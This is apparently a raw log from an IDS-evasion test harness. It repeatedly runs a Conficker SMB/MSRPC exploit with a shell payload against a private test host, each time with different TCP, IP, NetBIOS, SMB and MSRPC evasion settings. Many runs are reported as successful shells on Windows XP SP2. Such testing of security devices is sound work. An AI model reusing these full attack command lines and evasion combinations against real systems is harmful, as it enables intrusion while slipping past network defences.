- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39459 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=e7ylkdMUHfM --evasion=[smb_connect,msrpc_bind]tcp_chaff,"50%","chksum|outofwindow|shorthdr","shuffle30" --evasion=[smb_opentree,end]tcp_chaff,"1","chksum|nullchksum|outofwindow|shorthdr|longhdr","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","5","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed e7ylkdMUHfN
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * Invalid TCP checksum.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_opentree to end:
- - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.115:39459 -> 10.35.1.207:445
- Terminated
- .Pid 1876 timed out - killed
- 2015-06-07 23:30:11 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12116 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=GT8tDxBjFyg --evasion=[start,smb_connect]ipv4_opt,"1","inc","random" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed GT8tDxBjFyg
- The following evasions are applied from stage start to smb_connect:
- - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.114:12116 -> 10.35.1.207:445
- Terminated
- .......
- 1238 runs averaging 1.92 runs / second ; progress: 644/43200...Pid 1971 timed out - killed
- 2015-06-07 23:30:16 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43442 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=HPkkhP7YkHU --evasion=[smb_openpipe,msrpc_bind]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed HPkkhP7YkHU
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.111:43442 -> 10.35.1.207:445
- Terminated
- ....2015-06-07 23:30:18 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46188 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=1HDuHIYDD40 --evasion=[start,end]tcp_paws,"50%","9","random_alphanum" --evasion=[smb_connect,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed 1HDuHIYDD43
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.115:46188 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 1253 runs averaging 1.93 runs / second ; progress: 649/43200................
- 1269 runs averaging 1.94 runs / second ; progress: 654/43200...............
- 1284 runs averaging 1.95 runs / second ; progress: 659/43200....................
- 1304 runs averaging 1.96 runs / second ; progress: 664/43200............
- 1316 runs averaging 1.97 runs / second ; progress: 669/43200............
- 1328 runs averaging 1.97 runs / second ; progress: 674/43200..............
- 1342 runs averaging 1.97 runs / second ; progress: 680/43200..............
- 1356 runs averaging 1.98 runs / second ; progress: 685/432002015-06-07 23:30:55 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24700 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=NCyRKw2M+QU --evasion=[start,netbios_connect]ipv4_frag,"1464" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","110160382","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed NCyRKw2M+QU
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments with at most 1464 bytes per fragment
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 110160382> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.114:24700 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .............
- 1370 runs averaging 1.99 runs / second ; progress: 690/43200........
- 1378 runs averaging 1.98 runs / second ; progress: 695/43200............
- 1390 runs averaging 1.99 runs / second ; progress: 700/43200............
- 1402 runs averaging 1.99 runs / second ; progress: 705/43200.......
- 1409 runs averaging 1.99 runs / second ; progress: 710/43200.............
- 1422 runs averaging 1.99 runs / second ; progress: 715/43200...........
- 1433 runs averaging 1.99 runs / second ; progress: 720/43200.........
- 1442 runs averaging 1.99 runs / second ; progress: 725/43200....
- 1446 runs averaging 1.98 runs / second ; progress: 730/43200.......
- 1453 runs averaging 1.98 runs / second ; progress: 735/43200........
- 1461 runs averaging 1.98 runs / second ; progress: 740/43200.2015-06-07 23:31:50 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24569 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=2cSDsed3ITE --evasion=[smb_connect,msrpc_req]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[smb_opentree,end]tcp_paws,"5","6","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed 2cSDsed3ITH
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.114:24569 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 1468 runs averaging 1.97 runs / second ; progress: 745/43200...2015-06-07 23:31:57 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64502 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=yxKHXWbMZgw --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"add_null_trailer" --evasion=[start,end]tcp_paws,"50%","3","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed yxKHXWbMZgz
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - The SMB filename is obfuscated:
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.111:64502 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 1483 runs averaging 1.98 runs / second ; progress: 750/43200.....
- 1488 runs averaging 1.97 runs / second ; progress: 755/43200....
- 1492 runs averaging 1.96 runs / second ; progress: 760/43200.2015-06-07 23:32:11 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45139 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=dzj0POWrydM --evasion=[smb_opentree,msrpc_bind]smb_chaff,"25%","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","6","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed dzj0POWrydN
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.115:45139 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 1502 runs averaging 1.96 runs / second ; progress: 765/43200....
- 1506 runs averaging 1.96 runs / second ; progress: 770/43200Pid 3944 timed out - killed
- 2015-06-07 23:32:22 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42916 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=BSmDZs2V2KY --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_unspec","float_ibm","byte3_nonzero","byte4_nonzero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed BSmDZs2V2KY
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - MSRPC NDR flag is modified:
- * Unspecified character encoding
- * IBM floating point value encoding
- * Reserved 3rd byte is set to a random non-zero value
- * Reserved 4th byte is set to a random non-zero value
- Info: NetBIOS connection 10.62.90.116:42916 -> 10.35.1.207:445
- Terminated
- 1507 runs averaging 1.94 runs / second ; progress: 775/43200.
- 1508 runs averaging 1.93 runs / second ; progress: 780/43200.........
- 1517 runs averaging 1.93 runs / second ; progress: 785/43200.......
- 1524 runs averaging 1.93 runs / second ; progress: 790/43200.......
- 1531 runs averaging 1.93 runs / second ; progress: 795/43200...
- 1534 runs averaging 1.92 runs / second ; progress: 800/43200.
- 1535 runs averaging 1.91 runs / second ; progress: 805/43200Pid 4544 timed out - killed
- 2015-06-07 23:32:56 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52467 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=4ftBvYDCVZs --evasion=[netbios_connect,end]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 4ftBvYDCVZv
- The following evasions are applied from stage netbios_connect to end:
- - IPv4 fragments with at most 1472 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.118:52467 -> 10.35.1.207:445
- Terminated
- ....
- 1540 runs averaging 1.90 runs / second ; progress: 810/43200......
- 1546 runs averaging 1.90 runs / second ; progress: 815/43200......
- 1552 runs averaging 1.89 runs / second ; progress: 820/43200......
- 1558 runs averaging 1.89 runs / second ; progress: 825/43200.....
- 1563 runs averaging 1.88 runs / second ; progress: 830/43200..
- 1565 runs averaging 1.87 runs / second ; progress: 835/43200
- 1565 runs averaging 1.86 runs / second ; progress: 840/43200.......
- 1572 runs averaging 1.86 runs / second ; progress: 845/43200Pid 5247 timed out - killed
- 2015-06-07 23:33:36 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15300 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=hPpd4kR6QYQ --evasion=[smb_openpipe,msrpc_req]tcp_overlap,"4","new","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed hPpd4kR6QYS
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.117:15300 -> 10.35.1.207:445
- Terminated
- ....2015-06-07 23:33:38 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43645 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=NWacMXl/kLk --evasion=[msrpc_bind,msrpc_req]tcp_chaff,"21","chksum|nullflag|shorthdr|longhdr","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","128119346","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed NWacMXl/kLk
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 128119346> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.117:43645 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 1583 runs averaging 1.86 runs / second ; progress: 850/43200..Pid 5416 timed out - killed
- 2015-06-07 23:33:42 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30642 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=QbaOab59OMc --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"21","outofwindow","alphanumrandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_chaff,"50%","chksum|nullflag|outofwindow","unmodified" --evasion=[smb_openpipe,end]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed QbaOab59OMd
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * An out-of-window sequence number.
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- The following evasions are applied from stage smb_openpipe to end:
- - Add a zero urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.110:30642 -> 10.35.1.207:445
- Terminated
- ......
- 1592 runs averaging 1.86 runs / second ; progress: 855/43200..2015-06-07 23:33:46 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17668 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=No54XXttjfs --evasion=[start,end]tcp_initialseq,"3" --evasion=[smb_opentree,end]tcp_paws,"50%","8","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed No54XXttjfs
- - Initial TCP sequence number is set to 0xffffffff - 3
- The following evasions are applied from stage smb_opentree to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.110:17668 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 1606 runs averaging 1.87 runs / second ; progress: 860/43200............
- 1618 runs averaging 1.87 runs / second ; progress: 866/43200.....
- 1623 runs averaging 1.86 runs / second ; progress: 871/43200
- 1623 runs averaging 1.85 runs / second ; progress: 876/43200.....
- 1628 runs averaging 1.85 runs / second ; progress: 881/43200............
- 1640 runs averaging 1.85 runs / second ; progress: 886/43200......
- 1646 runs averaging 1.85 runs / second ; progress: 891/43200...
- 1649 runs averaging 1.84 runs / second ; progress: 896/43200.........
- 1658 runs averaging 1.84 runs / second ; progress: 901/43200...........2015-06-07 23:34:35 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59061 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=Jtc7r4XedFw --evasion=[smb_connect,msrpc_req]smb_decoytrees,"3","6","2","random_msrpcreq" --evasion=[smb_opentree,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed Jtc7r4XedFw
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_opentree to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.111:59061 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 1671 runs averaging 1.85 runs / second ; progress: 906/43200.................
- 1688 runs averaging 1.85 runs / second ; progress: 911/43200Pid 5990 timed out - killed
- 2015-06-07 23:34:41 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58631 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=zh+fzTjgSBM --evasion=[smb_connect,end]netbios_chaff,"25%","small_unspec|http_get|http_post|broken_length" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed zh+fzTjgSBP
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 50% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.112:58631 -> 10.35.1.207:445
- Terminated
- ...............
- 1704 runs averaging 1.86 runs / second ; progress: 916/432002015-06-07 23:34:46 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37611 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=O/Vg484ppb0 --evasion=[smb_connect,msrpc_bind]ipv4_frag,"192" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","6","shuffle" --evasion=[smb_opentree,smb_openpipe]tcp_segvar,"1577","40367" --verifydelay=1000 --payload=shell
- Info: Using random seed O/Vg484ppb0
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - IPv4 fragments with at most 192 bytes per fragment
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - TCP packets are segmented to contain between 1577 and 40367 bytes of payload.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.112:37611 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 1716 runs averaging 1.86 runs / second ; progress: 921/43200.......
- 1723 runs averaging 1.86 runs / second ; progress: 926/43200............
- 1735 runs averaging 1.86 runs / second ; progress: 931/43200...............
- 1750 runs averaging 1.87 runs / second ; progress: 936/43200................
- 1766 runs averaging 1.88 runs / second ; progress: 941/43200....2015-06-07 23:35:13 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34997 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=If/m9xhogZo --evasion=[netbios_connect,smb_opentree]ipv4_opt,"8","inc","alpharandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","267969810","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed If/m9xhogZo
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 267969810> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.116:34997 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .....
- 1776 runs averaging 1.88 runs / second ; progress: 946/43200................2015-06-07 23:35:21 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31846 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=g+Vl2tI+pn8 --evasion=[smb_connect,end]smb_chaff,"21","write_flag","zero" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"4","3","1723","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed g+Vl2tI+pn+
- The following evasions are applied from stage smb_connect to end:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1723 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.111:31846 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 1794 runs averaging 1.89 runs / second ; progress: 951/43200..................
- 1812 runs averaging 1.90 runs / second ; progress: 956/43200.........
- 1821 runs averaging 1.89 runs / second ; progress: 961/43200..2015-06-07 23:35:34 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54267 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=7y0JaWVYTKY --evasion=[start,smb_opentree]ipv4_opt,"13","inc","random_alphanum" --evasion=[smb_connect,end]tcp_paws,"5","124871207","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 7y0JaWVYTKb
- The following evasions are applied from stage start to smb_opentree:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 124871207> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.111:54267 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ............
- 1836 runs averaging 1.90 runs / second ; progress: 966/43200.........
- 1845 runs averaging 1.90 runs / second ; progress: 971/43200...............
- 1860 runs averaging 1.91 runs / second ; progress: 976/43200..2015-06-07 23:35:46 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53810 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=l+IKIQ4Qqwk --evasion=[msrpc_bind,end]tcp_chaff,"3","nullflag|shorthdr","alpharandomized" --evasion=[smb_connect,end]tcp_paws,"50%","268435455","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed l+IKIQ4Qqwm
- The following evasions are applied from stage smb_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.116:53810 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...............
- 1878 runs averaging 1.91 runs / second ; progress: 981/43200..2015-06-07 23:35:52 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37059 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=p48gpM55008 --evasion=[netbios_connect,end]tcp_paws,"50%","70435613","random_alphanum" --evasion=[netbios_connect,smb_connect]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed p48gpM5500+
- The following evasions are applied from stage netbios_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 70435613> and has random alphanumeric bytes as payload
- The following evasions are applied from stage netbios_connect to smb_connect:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.111:37059 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 1889 runs averaging 1.92 runs / second ; progress: 986/43200..........
- 1899 runs averaging 1.92 runs / second ; progress: 991/43200.....
- 1904 runs averaging 1.91 runs / second ; progress: 996/43200.......
- 1911 runs averaging 1.91 runs / second ; progress: 1001/43200......Pid 7942 timed out - killed
- 2015-06-07 23:36:14 INFO
- Timed out (10.62.90.119):
